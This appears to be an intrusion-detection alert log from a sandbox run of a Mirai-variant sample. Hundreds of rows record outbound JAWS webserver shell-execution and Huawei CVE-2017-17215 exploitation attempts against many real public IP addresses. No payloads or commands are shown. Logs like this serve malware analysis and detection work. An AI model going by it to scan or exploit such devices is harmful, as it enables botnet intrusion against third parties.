                                                2024-12-03T22:17:28.814523+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233383464.128.159.23980TCP
                                                2024-12-03T22:17:28.814523+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233383464.128.159.23980TCP
                                                2024-12-03T22:17:28.819043+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355146152.101.156.15280TCP
                                                2024-12-03T22:17:28.819043+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355146152.101.156.15280TCP
                                                2024-12-03T22:17:28.820842+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343798197.132.81.16180TCP
                                                2024-12-03T22:17:28.820842+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343798197.132.81.16180TCP
                                                2024-12-03T22:17:28.825955+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233358258.186.27.2880TCP
                                                2024-12-03T22:17:28.825955+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233358258.186.27.2880TCP
                                                2024-12-03T22:17:28.827205+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338550132.72.173.5480TCP
                                                2024-12-03T22:17:28.827205+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338550132.72.173.5480TCP
                                                2024-12-03T22:17:28.852128+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233326641.52.97.20580TCP
                                                2024-12-03T22:17:28.852128+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233326641.52.97.20580TCP
                                                2024-12-03T22:17:28.868121+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235422675.133.121.18380TCP
                                                2024-12-03T22:17:28.868121+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235422675.133.121.18380TCP
                                                2024-12-03T22:17:28.874326+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336082197.113.251.3037215TCP
                                                2024-12-03T22:17:28.890157+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233546241.7.189.10137215TCP
                                                2024-12-03T22:17:28.899202+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350056199.210.40.1980TCP
                                                2024-12-03T22:17:28.899202+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350056199.210.40.1980TCP
                                                2024-12-03T22:17:28.952386+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357134197.45.37.4037215TCP
                                                2024-12-03T22:17:28.961661+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234258241.105.24.14737215TCP
                                                2024-12-03T22:17:29.852239+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233452819.72.54.14880TCP
                                                2024-12-03T22:17:29.852239+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233452819.72.54.14880TCP
                                                2024-12-03T22:17:29.890287+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234399260.107.3.19780TCP
                                                2024-12-03T22:17:29.890287+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234399260.107.3.19780TCP
                                                2024-12-03T22:17:29.898980+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341636115.201.93.8680TCP
                                                2024-12-03T22:17:29.898980+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341636115.201.93.8680TCP
                                                2024-12-03T22:17:29.899200+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356466133.82.186.5680TCP
                                                2024-12-03T22:17:29.899200+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356466133.82.186.5680TCP
                                                2024-12-03T22:17:29.905440+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233574638.198.70.8580TCP
                                                2024-12-03T22:17:29.905440+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233574638.198.70.8580TCP
                                                2024-12-03T22:17:29.921221+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335168212.255.25.2980TCP
                                                2024-12-03T22:17:29.921221+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335168212.255.25.2980TCP
                                                2024-12-03T22:17:29.936959+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333068177.162.222.14180TCP
                                                2024-12-03T22:17:29.936959+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333068177.162.222.14180TCP
                                                2024-12-03T22:17:29.937019+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346532198.182.59.17180TCP
                                                2024-12-03T22:17:29.937019+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346532198.182.59.17180TCP
                                                2024-12-03T22:17:29.952483+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234779672.191.2.15480TCP
                                                2024-12-03T22:17:29.952483+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234779672.191.2.15480TCP
                                                2024-12-03T22:17:29.977259+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345194171.42.171.20980TCP
                                                2024-12-03T22:17:29.977259+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345194171.42.171.20980TCP
                                                2024-12-03T22:17:29.977500+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234002247.154.42.24980TCP
                                                2024-12-03T22:17:29.977500+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234002247.154.42.24980TCP
                                                2024-12-03T22:17:29.977600+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335706100.184.128.4280TCP
                                                2024-12-03T22:17:29.977600+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335706100.184.128.4280TCP
                                                2024-12-03T22:17:30.522011+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341164108.157.64.8580TCP
                                                2024-12-03T22:17:30.522011+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341164108.157.64.8580TCP
                                                2024-12-03T22:17:30.813583+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23451582.112.110.19580TCP
                                                2024-12-03T22:17:30.813583+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23451582.112.110.19580TCP
                                                2024-12-03T22:17:30.813600+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234426670.62.179.4180TCP
                                                2024-12-03T22:17:30.813600+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234426670.62.179.4180TCP
                                                2024-12-03T22:17:30.842935+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335624126.207.149.17380TCP
                                                2024-12-03T22:17:30.842935+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335624126.207.149.17380TCP
                                                2024-12-03T22:17:30.842949+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349800110.147.154.4480TCP
                                                2024-12-03T22:17:30.842949+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349800110.147.154.4480TCP
                                                2024-12-03T22:17:30.843513+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332992124.158.8.20880TCP
                                                2024-12-03T22:17:30.843513+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332992124.158.8.20880TCP
                                                2024-12-03T22:17:30.843521+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344168216.39.174.17980TCP
                                                2024-12-03T22:17:30.843521+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344168216.39.174.17980TCP
                                                2024-12-03T22:17:30.843539+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235976058.174.175.1080TCP
                                                2024-12-03T22:17:30.843539+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235976058.174.175.1080TCP
                                                2024-12-03T22:17:30.843558+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343494181.161.118.480TCP
                                                2024-12-03T22:17:30.843558+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343494181.161.118.480TCP
                                                2024-12-03T22:17:30.868432+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234731069.137.126.1680TCP
                                                2024-12-03T22:17:30.868432+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234731069.137.126.1680TCP
                                                2024-12-03T22:17:30.868447+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333848169.16.2.1980TCP
                                                2024-12-03T22:17:30.868447+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333848169.16.2.1980TCP
                                                2024-12-03T22:17:30.871451+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235768439.107.190.18680TCP
                                                2024-12-03T22:17:30.871451+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235768439.107.190.18680TCP
                                                2024-12-03T22:17:30.874633+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235537427.214.244.9980TCP
                                                2024-12-03T22:17:30.874633+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235537427.214.244.9980TCP
                                                2024-12-03T22:17:30.874636+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358582156.88.184.3980TCP
                                                2024-12-03T22:17:30.874636+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358582156.88.184.3980TCP
                                                2024-12-03T22:17:30.874638+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233706851.238.123.24980TCP
                                                2024-12-03T22:17:30.874638+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233706851.238.123.24980TCP
                                                2024-12-03T22:17:30.874659+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234905242.204.247.080TCP
                                                2024-12-03T22:17:30.874659+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234905242.204.247.080TCP
                                                2024-12-03T22:17:30.883606+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355402140.48.108.480TCP
                                                2024-12-03T22:17:30.883606+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355402140.48.108.480TCP
                                                2024-12-03T22:17:30.883629+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235459673.8.27.18980TCP
                                                2024-12-03T22:17:30.883629+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235459673.8.27.18980TCP
                                                2024-12-03T22:17:30.889909+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23500525.72.202.8380TCP
                                                2024-12-03T22:17:30.889909+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23500525.72.202.8380TCP
                                                2024-12-03T22:17:30.890447+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233554263.181.115.21880TCP
                                                2024-12-03T22:17:30.890447+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233554263.181.115.21880TCP
                                                2024-12-03T22:17:30.890460+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234996823.247.191.23580TCP
                                                2024-12-03T22:17:30.890460+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234996823.247.191.23580TCP
                                                2024-12-03T22:17:30.890478+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233630462.10.205.21780TCP
                                                2024-12-03T22:17:30.890478+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233630462.10.205.21780TCP
                                                2024-12-03T22:17:30.891069+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235207835.76.116.4080TCP
                                                2024-12-03T22:17:30.891069+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235207835.76.116.4080TCP
                                                2024-12-03T22:17:30.891071+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344966150.22.167.22480TCP
                                                2024-12-03T22:17:30.891071+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344966150.22.167.22480TCP
                                                2024-12-03T22:17:30.891075+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355510190.209.237.13580TCP
                                                2024-12-03T22:17:30.891075+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355510190.209.237.13580TCP
                                                2024-12-03T22:17:30.891079+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333086124.36.163.1580TCP
                                                2024-12-03T22:17:30.891079+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333086124.36.163.1580TCP
                                                2024-12-03T22:17:30.891559+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347754136.230.17.22780TCP
                                                2024-12-03T22:17:30.891559+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347754136.230.17.22780TCP
                                                2024-12-03T22:17:30.891580+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235501238.44.88.8480TCP
                                                2024-12-03T22:17:30.891580+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235501238.44.88.8480TCP
                                                2024-12-03T22:17:30.891588+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339982197.144.143.18137215TCP
                                                2024-12-03T22:17:30.899305+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339588220.17.106.680TCP
                                                2024-12-03T22:17:30.899305+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339588220.17.106.680TCP
                                                2024-12-03T22:17:30.899592+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358626105.244.168.9580TCP
                                                2024-12-03T22:17:30.899592+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358626105.244.168.9580TCP
                                                2024-12-03T22:17:30.899927+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350226177.251.155.12480TCP
                                                2024-12-03T22:17:30.899927+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350226177.251.155.12480TCP
                                                2024-12-03T22:17:30.900494+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343066201.144.89.14880TCP
                                                2024-12-03T22:17:30.900494+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343066201.144.89.14880TCP
                                                2024-12-03T22:17:30.900500+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332844200.142.198.13580TCP
                                                2024-12-03T22:17:30.900500+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332844200.142.198.13580TCP
                                                2024-12-03T22:17:30.931332+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345184172.250.40.7680TCP
                                                2024-12-03T22:17:30.931332+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345184172.250.40.7680TCP
                                                2024-12-03T22:17:30.931362+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333758132.110.148.17080TCP
                                                2024-12-03T22:17:30.931362+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333758132.110.148.17080TCP
                                                2024-12-03T22:17:30.931385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234530686.70.243.9680TCP
                                                2024-12-03T22:17:30.931385+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234530686.70.243.9680TCP
                                                2024-12-03T22:17:30.931406+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357008200.140.138.14780TCP
                                                2024-12-03T22:17:30.931406+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357008200.140.138.14780TCP
                                                2024-12-03T22:17:30.945979+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236024071.219.12.13180TCP
                                                2024-12-03T22:17:30.945979+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236024071.219.12.13180TCP
                                                2024-12-03T22:17:31.196085+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234932241.78.113.9637215TCP
                                                2024-12-03T22:17:31.202574+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340508156.52.61.11437215TCP
                                                2024-12-03T22:17:31.296082+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356274197.115.249.6737215TCP
                                                2024-12-03T22:17:31.311827+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335810156.92.200.137215TCP
                                                2024-12-03T22:17:31.311849+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354448156.169.1.9737215TCP
                                                2024-12-03T22:17:31.311870+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335610156.9.9.8937215TCP
                                                2024-12-03T22:17:31.321061+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235768041.90.62.4037215TCP
                                                2024-12-03T22:17:31.327195+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359198197.93.50.2737215TCP
                                                2024-12-03T22:17:31.327254+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234905241.14.17.14237215TCP
                                                2024-12-03T22:17:31.336454+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234845241.196.59.17037215TCP
                                                2024-12-03T22:17:31.336588+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235282841.125.152.21137215TCP
                                                2024-12-03T22:17:31.352359+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349904197.27.121.8737215TCP
                                                2024-12-03T22:17:31.820072+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357572160.2.24.18780TCP
                                                2024-12-03T22:17:31.820072+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357572160.2.24.18780TCP
                                                2024-12-03T22:17:31.836861+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350578218.29.246.1680TCP
                                                2024-12-03T22:17:31.836861+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350578218.29.246.1680TCP
                                                2024-12-03T22:17:31.843144+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343988198.32.122.22880TCP
                                                2024-12-03T22:17:31.843144+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343988198.32.122.22880TCP
                                                2024-12-03T22:17:31.852131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236068463.137.95.6480TCP
                                                2024-12-03T22:17:31.852131+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236068463.137.95.6480TCP
                                                2024-12-03T22:17:31.858490+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233830675.182.33.24680TCP
                                                2024-12-03T22:17:31.858490+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233830675.182.33.24680TCP
                                                2024-12-03T22:17:31.858583+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233585292.179.185.10980TCP
                                                2024-12-03T22:17:31.858583+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233585292.179.185.10980TCP
                                                2024-12-03T22:17:31.893521+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235161841.83.167.21337215TCP
                                                2024-12-03T22:17:31.899042+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357676180.220.252.8380TCP
                                                2024-12-03T22:17:31.899042+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357676180.220.252.8380TCP
                                                2024-12-03T22:17:31.930195+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350926115.66.129.3280TCP
                                                2024-12-03T22:17:31.930195+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350926115.66.129.3280TCP
                                                2024-12-03T22:17:31.936793+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233359437.123.150.15380TCP
                                                2024-12-03T22:17:31.936793+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233359437.123.150.15380TCP
                                                2024-12-03T22:17:32.015284+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348782195.200.142.2380TCP
                                                2024-12-03T22:17:32.015284+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348782195.200.142.2380TCP
                                                2024-12-03T22:17:32.040085+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234295863.80.245.21680TCP
                                                2024-12-03T22:17:32.040085+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234295863.80.245.21680TCP
                                                2024-12-03T22:17:32.180371+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352938156.59.49.12337215TCP
                                                2024-12-03T22:17:32.202497+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338276156.190.253.7837215TCP
                                                2024-12-03T22:17:32.227297+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234806441.10.198.22837215TCP
                                                2024-12-03T22:17:32.577516+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347998156.69.225.3737215TCP
                                                2024-12-03T22:17:33.187064+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340718156.208.52.24137215TCP
                                                2024-12-03T22:17:33.218466+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340926197.105.244.7037215TCP
                                                2024-12-03T22:17:33.227172+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235228041.183.102.8537215TCP
                                                2024-12-03T22:17:33.227302+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338664156.172.224.25537215TCP
                                                2024-12-03T22:17:33.227607+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348908197.214.166.19437215TCP
                                                2024-12-03T22:17:33.227627+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353936197.56.91.12537215TCP
                                                2024-12-03T22:17:33.227661+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350030156.7.106.19537215TCP
                                                2024-12-03T22:17:33.227861+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234664841.184.151.8737215TCP
                                                2024-12-03T22:17:33.233612+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358786156.183.226.1537215TCP
                                                2024-12-03T22:17:33.233722+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234808641.226.216.7337215TCP
                                                2024-12-03T22:17:33.249058+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235549641.227.141.537215TCP
                                                2024-12-03T22:17:33.265038+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23576602.93.19.23680TCP
                                                2024-12-03T22:17:33.265038+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23576602.93.19.23680TCP
                                                2024-12-03T22:17:33.265186+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234439441.38.160.16937215TCP
                                                2024-12-03T22:17:33.274228+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236004441.254.203.18537215TCP
                                                2024-12-03T22:17:33.289914+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357946197.76.109.18037215TCP
                                                2024-12-03T22:17:33.436644+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234127641.196.197.16137215TCP
                                                2024-12-03T22:17:33.524125+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357786197.38.60.23037215TCP
                                                2024-12-03T22:17:33.539693+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233667241.200.27.18237215TCP
                                                2024-12-03T22:17:33.539821+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234343041.69.219.16037215TCP
                                                2024-12-03T22:17:33.561556+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235705641.145.182.11437215TCP
                                                2024-12-03T22:17:33.561770+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351606156.206.56.5637215TCP
                                                2024-12-03T22:17:33.592865+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347750156.106.22.13937215TCP
                                                2024-12-03T22:17:33.592943+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356230156.97.198.17837215TCP
                                                2024-12-03T22:17:33.608745+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343902197.241.105.17037215TCP
                                                2024-12-03T22:17:33.649148+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338242197.36.125.13637215TCP
                                                2024-12-03T22:17:33.649231+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355366197.86.128.8237215TCP
                                                2024-12-03T22:17:34.218379+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234338647.93.110.14380TCP
                                                2024-12-03T22:17:34.218379+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234338647.93.110.14380TCP
                                                2024-12-03T22:17:34.321112+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335864204.181.218.4880TCP
                                                2024-12-03T22:17:34.321112+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335864204.181.218.4880TCP
                                                2024-12-03T22:17:34.343131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357022124.30.74.11880TCP
                                                2024-12-03T22:17:34.343131+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357022124.30.74.11880TCP
                                                2024-12-03T22:17:34.343141+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359466208.169.160.19180TCP
                                                2024-12-03T22:17:34.343141+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359466208.169.160.19180TCP
                                                2024-12-03T22:17:34.390050+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350138197.213.62.1937215TCP
                                                2024-12-03T22:17:34.390125+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345964156.139.198.24337215TCP
                                                2024-12-03T22:17:34.399229+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234089686.145.3.2280TCP
                                                2024-12-03T22:17:34.399229+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234089686.145.3.2280TCP
